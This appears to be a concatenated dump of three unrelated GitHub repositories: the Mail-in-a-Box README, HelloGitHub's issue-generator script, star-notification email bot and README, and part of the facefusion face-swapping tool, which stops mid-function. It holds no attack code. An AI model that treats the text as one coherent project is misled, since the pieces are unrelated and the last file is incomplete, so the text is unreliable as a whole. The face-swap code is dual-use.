Mail-in-a-Box ============= By [@JoshData](https://github.com/JoshData) and [contributors](https://github.com/mail-in-a-box/mailinabox/graphs/contributors). Mail-in-a-Box helps individuals take back control of their email by defining a one-click, easy-to-deploy SMTP+everything else server: a mail server in a box. **Please see [https://mailinabox.email](https://mailinabox.email) for the project's website and setup guide!** * * * Our goals are to: * Make deploying a good mail server easy. * Promote [decentralization](http://redecentralize.org/), innovation, and privacy on the web. * Have automated, auditable, and [idempotent](https://web.archive.org/web/20190518072631/https://sharknet.us/2014/02/01/automated-configuration-management-challenges-with-idempotency/) configuration. * **Not** make a totally unhackable, NSA-proof server. * **Not** make something customizable by power users. Additionally, this project has a [Code of Conduct](CODE_OF_CONDUCT.md), which supersedes the goals above. Please review it when joining our community. In The Box ---------- Mail-in-a-Box turns a fresh Ubuntu 22.04 LTS 64-bit machine into a working mail server by installing and configuring various components. It is a one-click email appliance. There are no user-configurable setup options. It "just works." The components installed are: * SMTP ([postfix](http://www.postfix.org/)), IMAP ([Dovecot](http://dovecot.org/)), CardDAV/CalDAV ([Nextcloud](https://nextcloud.com/)), and Exchange ActiveSync ([z-push](http://z-push.org/)) servers * Webmail ([Roundcube](http://roundcube.net/)), mail filter rules (thanks to Roundcube and Dovecot), and email client autoconfig settings (served by [nginx](http://nginx.org/)) * Spam filtering ([spamassassin](https://spamassassin.apache.org/)) and greylisting ([postgrey](http://postgrey.schweikert.ch/)) * DNS ([nsd4](https://www.nlnetlabs.nl/projects/nsd/)) with [SPF](https://en.wikipedia.org/wiki/Sender_Policy_Framework), DKIM ([OpenDKIM](http://www.opendkim.org/)), [DMARC](https://en.wikipedia.org/wiki/DMARC), [DNSSEC](https://en.wikipedia.org/wiki/DNSSEC), [DANE TLSA](https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities), [MTA-STS](https://tools.ietf.org/html/rfc8461), and [SSHFP](https://tools.ietf.org/html/rfc4255) policy records automatically set * TLS certificates are automatically provisioned using [Let's Encrypt](https://letsencrypt.org/) for protecting https and all of the other services on the box * Backups ([duplicity](http://duplicity.nongnu.org/)), firewall ([ufw](https://launchpad.net/ufw)), intrusion protection ([fail2ban](http://www.fail2ban.org/wiki/index.php/Main_Page)), and basic system monitoring ([munin](http://munin-monitoring.org/)) It also includes system management tools: * Comprehensive health monitoring that checks each day that services are running, ports are open, TLS certificates are valid, and DNS records are correct * A control panel for adding/removing mail users, aliases, custom DNS records, configuring backups, etc. * An API for all of the actions on the control panel Internationalized domain names are supported and configured easily (but SMTPUTF8 is not supported, unfortunately). It also supports static website hosting since the box is serving HTTPS anyway. (To serve a website for your domains elsewhere, just add a custom DNS "A" record in you Mail-in-a-Box's control panel to point domains to another server.) For more information on how Mail-in-a-Box handles your privacy, see the [security details page](security.md). Installation ------------ See the [setup guide](https://mailinabox.email/guide.html) for detailed, user-friendly instructions. For experts, start with a completely fresh (really, I mean it) Ubuntu 22.04 LTS 64-bit machine. On the machine... Clone this repository and checkout the tag corresponding to the most recent release (which you can find in the tags or releases lists on GitHub): $ git clone https://github.com/mail-in-a-box/mailinabox $ cd mailinabox $ git checkout TAGNAME Begin the installation. $ sudo setup/start.sh The installation will install, uninstall, and configure packages to turn the machine into a working, good mail server. For help, DO NOT contact Josh directly --- I don't do tech support by email or tweet (no exceptions). Post your question on the [discussion forum](https://discourse.mailinabox.email/) instead, where maintainers and Mail-in-a-Box users may be able to help you. Note that while we want everything to "just work," we can't control the rest of the Internet. Other mail services might block or spam-filter email sent from your Mail-in-a-Box. This is a challenge faced by everyone who runs their own mail server, with or without Mail-in-a-Box. See our discussion forum for tips about that. Contributing and Development ---------------------------- Mail-in-a-Box is an open source project. Your contributions and pull requests are welcome. See [CONTRIBUTING](CONTRIBUTING.md) to get started. The Acknowledgements -------------------- This project was inspired in part by the ["NSA-proof your email in 2 hours"](http://sealedabstract.com/code/nsa-proof-your-e-mail-in-2-hours/) blog post by Drew Crawford, [Sovereign](https://github.com/sovereign/sovereign) by Alex Payne, and conversations with <a href="https://twitter.com/shevski" target="_blank">@shevski</a>, <a href="https://github.com/konklone" target="_blank">@konklone</a>, and <a href="https://github.com/gregelin" target="_blank">@GregElin</a>. Mail-in-a-Box is similar to [iRedMail](http://www.iredmail.org/) and [Modoboa](https://github.com/tonioo/modoboa). The History ----------- * In 2007 I wrote a relatively popular Mozilla Thunderbird extension that added client-side SPF and DKIM checks to mail to warn users about possible phishing: [add-on page](https://addons.mozilla.org/en-us/thunderbird/addon/sender-verification-anti-phish/), [source](https://github.com/JoshData/thunderbird-spf). * In August 2013 I began Mail-in-a-Box by combining my own mail server configuration with the setup in ["NSA-proof your email in 2 hours"](http://sealedabstract.com/code/nsa-proof-your-e-mail-in-2-hours/) and making the setup steps reproducible with bash scripts. * Mail-in-a-Box was a semifinalist in the 2014 [Knight News Challenge](https://www.newschallenge.org/challenge/2014/submissions/mail-in-a-box), but it was not selected as a winner. * Mail-in-a-Box hit the front page of Hacker News in [April](https://news.ycombinator.com/item?id=7634514) 2014, [September](https://news.ycombinator.com/item?id=8276171) 2014, [May](https://news.ycombinator.com/item?id=9624267) 2015, and [November](https://news.ycombinator.com/item?id=13050500) 2016. * FastCompany mentioned Mail-in-a-Box a [roundup of privacy projects](http://www.fastcompany.com/3047645/your-own-private-cloud) on June 26, 2015.
HelloGitHub
739e7f170bd65fa27ad52804cef107c4fb020184
File: script/make_content/make_content.py #!/usr/bin/env python # -*- coding:utf-8 -*- # # Author : XueWeiHan # E-mail : [email protected] # Date : 16/10/21 下午1:41 # Desc : HelloGitHub项目——生成月刊脚本 """ 该脚本主要用于:生成月刊 《HelloGitHub》月刊每期内容都遵循统一格式,如果需要对通用部分的内容进行修改,需要手动修改每一 期的内容,这是不优雅的。 所以,我打算写个脚本,用于生成月刊,这样如果修改了通用内容部分,就只需要重新生成月刊,而不需要 手动修改已发布的所有期的内容。 """ from __future__ import print_function import sys import os CONTENT_FLAG = '{{ hello_github_content }}' NUM_FLAG = '{{ hello_github_num }}' class InputError(Exception): def __init__(self, message): self.message = message def __str__(self): return repr(self.message) def check_path(path): """ 检查路径是否存在 """ if not os.path.exists(path): print('not exist: {path}'.format(path=path)) return False else: return True def read_file(input_path): with open(input_path, 'r') as fb: return fb.read() def write_file(output_path, output_data): with open(output_path, 'w') as fb: fb.write(output_data) def make_content(num): template_path = os.path.join(os.path.abspath(os.curdir), 'template.md') output_path = os.path.join(os.path.abspath(os.curdir), num) content_path = os.path.join(output_path, 'content'+num+'.md') if not (check_path(content_path) and check_path(template_path)): # 如果 content 和 template 文件不存在 return None temple_data = read_file(template_path).replace(NUM_FLAG, num) content_data = read_file(content_path) output_data = temple_data.replace(CONTENT_FLAG, content_data) write_file(os.path.join(output_path, 'HelloGitHub{num}.md'.format(num=num)), output_data) print('Make 《GitHub月刊{num}》 successful!'.format(num=num)) def make_all_content(): dir_list = os.listdir(os.path.abspath(os.curdir)) for fi_dir in dir_list: # 忽略‘script’的目录 if os.path.isdir(fi_dir) and 'script' not in fi_dir: make_content(fi_dir) def main(): """ 入口方法 """ input_list = sys.argv # 获取输入的参数 if len(input_list) != 2: raise InputError('Input error: Need a param') else: try: input_arg = input_list[1] except Exception: raise InputError('Input error: Must be number') if len(input_arg) == 1: make_content('0' + input_arg) elif input_arg == 'all': make_all_content() else: make_content(input_arg) if __name__ == '__main__': main() File: script/github_bot/github_bot.py #!/usr/bin/env python # -*- coding:utf-8 -*- # # Author : XueWeiHan # E-mail : [email protected] # Date : 16/8/30 下午10:43 # Desc : Github Bot import os import logging import smtplib import datetime from operator import itemgetter from email.mime.text import MIMEText from email.header import Header import requests logging.basicConfig( level=logging.WARNING, filename=os.path.join(os.path.dirname(__file__), 'bot_log.txt'), filemode='a', format='%(name)s %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s' ) logger = logging.getLogger('Bot') # 设置log名称 # github帐号 ACCOUNT = { 'username': '', 'password': '' } API = { 'events': 'https://api.github.com/users/{username}/received_events'.format(username=ACCOUNT['username']) } # 发送邮件,邮箱的信息 MAIL = { 'mail': '', # 发送邮件的邮箱地址 'username': '', 'password': '', 'host': 'smtp.qq.com', 'port': 465 } # 接收邮件的邮箱地址 RECEIVERS = [] # 几天前 DAY = 1 # 项目stars临界值 STARS = 100 # qq邮件服务文档:http://service.mail.qq.com/cgi-bin/help?id=28 CONTENT_FORMAT = """ <table border="2" align="center"> <tr> <th>头像</th> <th>用户名</th> <th>项目名</th> <th>starred 日期</th> <th>项目 star 数量</th> </tr> {project_info_string} </table> """ def get_data(page=1): """ 从目标源获取数据 https://developer.github.com/v3/activity/events/ GitHub 规定:默认每页 30 条,最多 300 条目 """ args = '?page={page}'.format(page=page) response = requests.get(API['events']+args, auth=(ACCOUNT['username'], ACCOUNT['password'])) status_code = response.status_code if status_code == 200: resp_json = response.json() return resp_json else: logging.error('请求 event api 失败:', status_code) return [] def get_all_data(): """ 获取全部 300 条的数据 https://developer.github.com/v3/activity/events/ GitHub 规定:默认每页 30 条,最多 300 条目 """ all_data_list = [] for i in range(10): response_json = get_data(i+1) if response_json: all_data_list.extend(response_json) return all_data_list def check_condition(data): """ 过滤条件 """ create_time = datetime.datetime.strptime( data['created_at'], "%Y-%m-%dT%H:%M:%SZ") + datetime.timedelta(hours=8) date_condition = create_time >= (datetime.datetime.now() - datetime.timedelta(days=DAY)) if (data['type'] == 'WatchEvent') and date_condition: # 不统计自己项目的star事件 if data['payload']['action'] == 'started' and \ ACCOUNT['username'] not in data['repo']['name']: data['date_time'] = create_time.strftime("%Y-%m-%d %H:%M:%S") return True else: return False def analyze(json_data): """ 分析获取的数据 :return 符合过滤条件的数据 """ result_data = [] for fi_data in json_data: if check_condition(fi_data): result_data.append(fi_data) return result_data def get_stars(data): """ 获取stars数量,同时过滤掉stars数量少的项目 """ project_info_list = [] for fi_data in data: project_info = dict() project_info['user'] = fi_data['actor']['login'] project_info['user_url'] = 'https://github.com/' + project_info['user'] project_info['avatar_url'] = fi_data['actor']['avatar_url'] project_info['repo_name'] = fi_data['repo']['name'] project_info['repo_url'] = 'https://github.com/' + project_info['repo_name'] project_info['date_time'] = fi_data['date_time'] try: repo_stars = requests.get(fi_data['repo']['url'], timeout=2).json() if repo_stars: project_info['repo_stars'] = int(repo_stars['stargazers_count']) else: project_info['repo_stars'] = -1 except Exception as e: project_info['repo_stars'] = -1 logger.warning(u'获取:{} 项目星数失败——{}'.format( project_info['repo_name'], e)) finally: if project_info['repo_stars'] >= STARS or project_info['repo_stars'] == -1: # 过滤掉star数量低于临界值的项目 project_info_list.append(project_info) project_info_list = sorted(project_info_list, key=itemgetter('repo_stars'), reverse=True) return project_info_list def make_content(): """ 生成发布邮件的内容 """ json_data = get_all_data() data = analyze(json_data) content = [] project_info_list = get_stars(data) for project_info in project_info_list: project_info_string = """<tr> <td><img src={avatar_url} width=32px></img></td> <td><a href={user_url}>{user}</a></td> <td><a href={repo_url}>{repo_name}</a></td> <td>{date_time}</td> <td>{repo_stars}</td> </tr> """.format(**project_info) content.append(project_info_string) return content def send_email(receivers, email_content): """ 发送邮件 """ sender = MAIL['mail'] # 发送邮件的邮箱 receivers = receivers # 接收邮件的邮箱,可设置多个 # 三个参数:第一个为文本内容,第二个 html 设置文本格式,第三个 utf-8 设置编码 message = MIMEText( CONTENT_FORMAT.format(project_info_string=''.join(email_content)), 'html', 'utf-8' ) message['From'] = Header(u'GitHub 机器人', 'utf-8') message['To'] = Header(u'削微寒', 'utf-8') subject = u'今日 GitHub 热点' # 设置邮件主题 message['Subject'] = Header(subject, 'utf-8') try: smtp_obj = smtplib.SMTP_SSL() # qq邮箱要求是https连接,所以需要用SMTP_SSL smtp_obj.connect(MAIL['host'], MAIL['port']) # 设置SMTP地址和端口号 smtp_obj.login(MAIL['username'], MAIL['password']) smtp_obj.sendmail(sender, receivers, message.as_string()) except smtplib.SMTPException as e: logger.error(u"无法发送邮件: {}".format(e)) if __name__ == '__main__': content = make_content() send_email(RECEIVERS, content)
<p align="center"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/readme.gif"/> <br>中文 | <a href="README_en.md">English</a> | <a href="README_ja.md">日本語</a> <br>分享 GitHub 上有趣、入门级的开源项目。<br>兴趣是最好的老师,这里能够帮你找到编程的兴趣! </p> <p align="center"> <a href="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/weixin.png"><img src="https://img.shields.io/badge/Talk-%E5%BE%AE%E4%BF%A1%E7%BE%A4-brightgreen.svg?style=popout-square" alt="WeiXin"></a> <a href="https://github.com/521xueweihan/HelloGitHub/stargazers"><img src="https://img.shields.io/github/stars/521xueweihan/HelloGitHub.svg?style=popout-square" alt="GitHub stars"></a> <a href="https://github.com/521xueweihan/HelloGitHub/issues"><img src="https://img.shields.io/github/issues/521xueweihan/HelloGitHub.svg?style=popout-square" alt="GitHub issues"></a> <a href="https://weibo.com/hellogithub"><img src="https://img.shields.io/badge/%E6%96%B0%E6%B5%AA-Weibo-red.svg?style=popout-square" alt="Sina Weibo"></a> </p> ## 简介 HelloGitHub 分享 GitHub 上有趣、入门级的开源项目。**每月 28 号**以月刊的形式[更新发布](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzA5MzYyNzQ0MQ==&action=getalbum&album_id=1331197538447310849#wechat_redirect),内容包括:**有趣、入门级的开源项目**、**开源书籍**、**实战项目**、**企业级项目**等,让你用很短时间感受到开源的魅力,爱上开源! ## 内容 获得更好的阅读体验 [官网](https://hellogithub.com/) 或 [HelloGitHub 公众号](https://cdn.jsdelivr.net/gh/521xueweihan/img_logo@main/logo/weixin.png) | :card_index: | :jack_o_lantern: | :beer: | :fish_cake: | :octocat: | | ------- | ----- | ------------ | ------ | --------- | | [第 101 期](/content/HelloGitHub101.md) | | [第 100 期](/content/HelloGitHub100.md) | [第 99 期](/content/HelloGitHub99.md) | [第 98 期](/content/HelloGitHub98.md) | [第 97 期](/content/HelloGitHub97.md) | [第 96 期](/content/HelloGitHub96.md) | | [第 95 期](/content/HelloGitHub95.md) | [第 94 期](/content/HelloGitHub94.md) | [第 93 期](/content/HelloGitHub93.md) | [第 92 期](/content/HelloGitHub92.md) | [第 91 期](/content/HelloGitHub91.md) | | [第 90 期](/content/HelloGitHub90.md) | [第 89 期](/content/HelloGitHub89.md) | [第 88 期](/content/HelloGitHub88.md) | [第 87 期](/content/HelloGitHub87.md) | [第 86 期](/content/HelloGitHub86.md) | | [第 85 期](/content/HelloGitHub85.md) | [第 84 期](/content/HelloGitHub84.md) | [第 83 期](/content/HelloGitHub83.md) | [第 82 期](/content/HelloGitHub82.md) | [第 81 期](/content/HelloGitHub81.md) | | [第 80 期](/content/HelloGitHub80.md) | [第 79 期](/content/HelloGitHub79.md) | [第 78 期](/content/HelloGitHub78.md) | [第 77 期](/content/HelloGitHub77.md) | [第 76 期](/content/HelloGitHub76.md) | | [第 75 期](/content/HelloGitHub75.md) | [第 74 期](/content/HelloGitHub74.md) | [第 73 期](/content/HelloGitHub73.md) | [第 72 期](/content/HelloGitHub72.md) | [第 71 期](/content/HelloGitHub71.md) | | [第 70 期](/content/HelloGitHub70.md) | [第 69 期](/content/HelloGitHub69.md) | [第 68 期](/content/HelloGitHub68.md) | [第 67 期](/content/HelloGitHub67.md) | [第 66 期](/content/HelloGitHub66.md) | 欢迎[推荐或自荐](https://hellogithub.com/periodical)项目成为 **HelloGitHub** 的[贡献者](https://github.com/521xueweihan/HelloGitHub/blob/master/content/contributors.md) ## 赞助 <table> <thead> <tr> <th align="center" style="width: 80px;"> <a href="https://www.ucloud.cn/site/active/gpu.html?utm_term=logo&utm_campaign=hellogithub&utm_source=otherdsp&utm_medium=display&ytag=logo_hellogithub_otherdsp_display"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/ucloud.png" width="60px"><br> <sub>UCloud</sub><br> <sub>超值的GPU云服务</sub> </a> </th> <th align="center" style="width: 80px;"> <a href="https://www.upyun.com/?from=hellogithub"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/upyun.png" width="60px"><br> <sub>CDN</sub><br> <sub>开启全网加速</sub> </a> </th> <th align="center" style="width: 80px;"> <a href="https://github.com/OpenIMSDK/Open-IM-Server"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/im.png" width="60px"><br> <sub>OpenIM</sub><br> <sub>开源IM力争No.1</sub> </a> </th> <th align="center" style="width: 80px;"> <a href="https://apifox.cn/a103hello"> <img src="https://raw.githubusercontent.com/521xueweihan/img_logo/master/logo/apifox.png" width="60px"><br> <sub>Apifox</sub><br> <sub>比 Postman 更强大</sub> </a> </th> </tr> </thead> </table> ## 声明 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh"><img alt="知识共享许可协议" style="border-width: 0" src="https://licensebuttons.net/l/by-nc-nd/4.0/88x31.png"></a><br>本作品采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh">署名-非商业性使用-禁止演绎 4.0 国际</a> 进行许可。<a href="mailto:[email protected]">联系我</a>
facefusion
57016d7c778c70f58fc54c49013d57179874a505
File: run.py #!/usr/bin/env python3 from facefusion import core if __name__ == '__main__': core.cli() File: install.py #!/usr/bin/env python3 import os import subprocess os.environ['PIP_BREAK_SYSTEM_PACKAGES'] = '1' subprocess.call([ 'pip', 'install', 'inquirer', '-q' ]) from facefusion import installer if __name__ == '__main__': installer.cli() File: facefusion/face_analyser.py from typing import Any, Optional, List, Tuple from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals from facefusion import process_manager from facefusion.common_helper import get_first from facefusion.face_helper import estimate_matrix_by_face_landmark_5, warp_face_by_face_landmark_5, warp_face_by_translation, create_static_anchors, distance_to_face_landmark_5, distance_to_bounding_box, convert_face_landmark_68_to_5, apply_nms, categorize_age, categorize_gender from facefusion.face_store import get_static_faces, set_static_faces from facefusion.execution import apply_execution_provider_options from facefusion.download import conditional_download from facefusion.filesystem import resolve_relative_path, is_file from facefusion.thread_helper import thread_lock, thread_semaphore, conditional_thread_semaphore from facefusion.typing import VisionFrame, Face, FaceSet, FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, ModelSet, BoundingBox, FaceLandmarkSet, FaceLandmark5, FaceLandmark68, Score, FaceScoreSet, Embedding from facefusion.vision import resize_frame_resolution, unpack_resolution FACE_ANALYSER = None MODELS : ModelSet =\ { 'face_detector_retinaface': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/retinaface_10g.onnx', 'path': resolve_relative_path('../.assets/models/retinaface_10g.onnx') }, 'face_detector_scrfd': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/scrfd_2.5g.onnx', 'path': resolve_relative_path('../.assets/models/scrfd_2.5g.onnx') }, 'face_detector_yoloface': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/yoloface_8n.onnx', 'path': resolve_relative_path('../.assets/models/yoloface_8n.onnx') }, 'face_detector_yunet': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/yunet_2023mar.onnx', 'path': resolve_relative_path('../.assets/models/yunet_2023mar.onnx') }, 'face_recognizer_arcface_blendswap': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_w600k_r50.onnx', 'path': resolve_relative_path('../.assets/models/arcface_w600k_r50.onnx') }, 'face_recognizer_arcface_inswapper': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_w600k_r50.onnx', 'path': resolve_relative_path('../.assets/models/arcface_w600k_r50.onnx') }, 'face_recognizer_arcface_simswap': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_simswap.onnx', 'path': resolve_relative_path('../.assets/models/arcface_simswap.onnx') }, 'face_recognizer_arcface_uniface': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/arcface_w600k_r50.onnx', 'path': resolve_relative_path('../.assets/models/arcface_w600k_r50.onnx') }, 'face_landmarker_68': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/2dfan4.onnx', 'path': resolve_relative_path('../.assets/models/2dfan4.onnx') }, 'face_landmarker_68_5': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/face_landmarker_68_5.onnx', 'path': resolve_relative_path('../.assets/models/face_landmarker_68_5.onnx') }, 'gender_age': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gender_age.onnx', 'path': resolve_relative_path('../.assets/models/gender_age.onnx') } } def get_face_analyser() -> Any: global FACE_ANALYSER face_detectors = {} face_landmarkers = {} with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FACE_ANALYSER is None: if facefusion.globals.face_detector_model in [ 'many', 'retinaface' ]: face_detectors['retinaface'] = onnxruntime.InferenceSession(MODELS.get('face_detector_retinaface').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_detector_model in [ 'many', 'scrfd' ]: face_detectors['scrfd'] = onnxruntime.InferenceSession(MODELS.get('face_detector_scrfd').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_detector_model in [ 'many', 'yoloface' ]: face_detectors['yoloface'] = onnxruntime.InferenceSession(MODELS.get('face_detector_yoloface').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_detector_model in [ 'yunet' ]: face_detectors['yunet'] = cv2.FaceDetectorYN.create(MODELS.get('face_detector_yunet').get('path'), '', (0, 0)) if facefusion.globals.face_recognizer_model == 'arcface_blendswap': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_blendswap').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_recognizer_model == 'arcface_inswapper': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_inswapper').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_recognizer_model == 'arcface_simswap': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_simswap').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) if facefusion.globals.face_recognizer_model == 'arcface_uniface': face_recognizer = onnxruntime.InferenceSession(MODELS.get('face_recognizer_arcface_uniface').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) face_landmarkers['68'] = onnxruntime.InferenceSession(MODELS.get('face_landmarker_68').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) face_landmarkers['68_5'] = onnxruntime.InferenceSession(MODELS.get('face_landmarker_68_5').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) gender_age = onnxruntime.InferenceSession(MODELS.get('gender_age').get('path'), providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) FACE_ANALYSER =\ { 'face_detectors': face_detectors, 'face_recognizer': face_recognizer, 'face_landmarkers': face_landmarkers, 'gender_age': gender_age } return FACE_ANALYSER def clear_face_analyser() -> Any: global FACE_ANALYSER FACE_ANALYSER = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_urls =\ [ MODELS.get('face_landmarker_68').get('url'), MODELS.get('face_landmarker_68_5').get('url'), MODELS.get('gender_age').get('url') ] model_paths =\ [ MODELS.get('face_landmarker_68').get('path'), MODELS.get('face_landmarker_68_5').get('path'), MODELS.get('gender_age').get('path') ] if facefusion.globals.face_detector_model in [ 'many', 'retinaface' ]: model_urls.append(MODELS.get('face_detector_retinaface').get('url')) model_paths.append(MODELS.get('face_detector_retinaface').get('path')) if facefusion.globals.face_detector_model in [ 'many', 'scrfd' ]: model_urls.append(MODELS.get('face_detector_scrfd').get('url')) model_paths.append(MODELS.get('face_detector_scrfd').get('path')) if facefusion.globals.face_detector_model in [ 'many', 'yoloface' ]: model_urls.append(MODELS.get('face_detector_yoloface').get('url')) model_paths.append(MODELS.get('face_detector_yoloface').get('path')) if facefusion.globals.face_detector_model in [ 'yunet' ]: model_urls.append(MODELS.get('face_detector_yunet').get('url')) model_paths.append(MODELS.get('face_detector_yunet').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_blendswap': model_urls.append(MODELS.get('face_recognizer_arcface_blendswap').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_blendswap').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_inswapper': model_urls.append(MODELS.get('face_recognizer_arcface_inswapper').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_inswapper').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_simswap': model_urls.append(MODELS.get('face_recognizer_arcface_simswap').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_simswap').get('path')) if facefusion.globals.face_recognizer_model == 'arcface_uniface': model_urls.append(MODELS.get('face_recognizer_arcface_uniface').get('url')) model_paths.append(MODELS.get('face_recognizer_arcface_uniface').get('path')) if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, model_urls) process_manager.end() return all(is_file(model_path) for model_path in model_paths) def detect_with_retinaface(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('retinaface') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] feature_strides = [ 8, 16, 32 ] feature_map_channel = 3 anchor_total = 2 bounding_box_list = [] face_landmark_5_list = [] score_list = [] detect_vision_frame = prepare_detect_frame(temp_vision_frame, face_detector_size) with thread_semaphore(): detections = face_detector.run(None, { face_detector.get_inputs()[0].name: detect_vision_frame }) for index, feature_stride in enumerate(feature_strides): keep_indices = numpy.where(detections[index] >= facefusion.globals.face_detector_score)[0] if keep_indices.any(): stride_height = face_detector_height // feature_stride stride_width = face_detector_width // feature_stride anchors = create_static_anchors(feature_stride, anchor_total, stride_height, stride_width) bounding_box_raw = detections[index + feature_map_channel] * feature_stride face_landmark_5_raw = detections[index + feature_map_channel * 2] * feature_stride for bounding_box in distance_to_bounding_box(anchors, bounding_box_raw)[keep_indices]: bounding_box_list.append(numpy.array( [ bounding_box[0] * ratio_width, bounding_box[1] * ratio_height, bounding_box[2] * ratio_width, bounding_box[3] * ratio_height ])) for face_landmark_5 in distance_to_face_landmark_5(anchors, face_landmark_5_raw)[keep_indices]: face_landmark_5_list.append(face_landmark_5 * [ ratio_width, ratio_height ]) for score in detections[index][keep_indices]: score_list.append(score[0]) return bounding_box_list, face_landmark_5_list, score_list def detect_with_scrfd(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('scrfd') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] feature_strides = [ 8, 16, 32 ] feature_map_channel = 3 anchor_total = 2 bounding_box_list = [] face_landmark_5_list = [] score_list = [] detect_vision_frame = prepare_detect_frame(temp_vision_frame, face_detector_size) with thread_semaphore(): detections = face_detector.run(None, { face_detector.get_inputs()[0].name: detect_vision_frame }) for index, feature_stride in enumerate(feature_strides): keep_indices = numpy.where(detections[index] >= facefusion.globals.face_detector_score)[0] if keep_indices.any(): stride_height = face_detector_height // feature_stride stride_width = face_detector_width // feature_stride anchors = create_static_anchors(feature_stride, anchor_total, stride_height, stride_width) bounding_box_raw = detections[index + feature_map_channel] * feature_stride face_landmark_5_raw = detections[index + feature_map_channel * 2] * feature_stride for bounding_box in distance_to_bounding_box(anchors, bounding_box_raw)[keep_indices]: bounding_box_list.append(numpy.array( [ bounding_box[0] * ratio_width, bounding_box[1] * ratio_height, bounding_box[2] * ratio_width, bounding_box[3] * ratio_height ])) for face_landmark_5 in distance_to_face_landmark_5(anchors, face_landmark_5_raw)[keep_indices]: face_landmark_5_list.append(face_landmark_5 * [ ratio_width, ratio_height ]) for score in detections[index][keep_indices]: score_list.append(score[0]) return bounding_box_list, face_landmark_5_list, score_list def detect_with_yoloface(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('yoloface') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] bounding_box_list = [] face_landmark_5_list = [] score_list = [] detect_vision_frame = prepare_detect_frame(temp_vision_frame, face_detector_size) with thread_semaphore(): detections = face_detector.run(None, { face_detector.get_inputs()[0].name: detect_vision_frame }) detections = numpy.squeeze(detections).T bounding_box_raw, score_raw, face_landmark_5_raw = numpy.split(detections, [ 4, 5 ], axis = 1) keep_indices = numpy.where(score_raw > facefusion.globals.face_detector_score)[0] if keep_indices.any(): bounding_box_raw, face_landmark_5_raw, score_raw = bounding_box_raw[keep_indices], face_landmark_5_raw[keep_indices], score_raw[keep_indices] for bounding_box in bounding_box_raw: bounding_box_list.append(numpy.array( [ (bounding_box[0] - bounding_box[2] / 2) * ratio_width, (bounding_box[1] - bounding_box[3] / 2) * ratio_height, (bounding_box[0] + 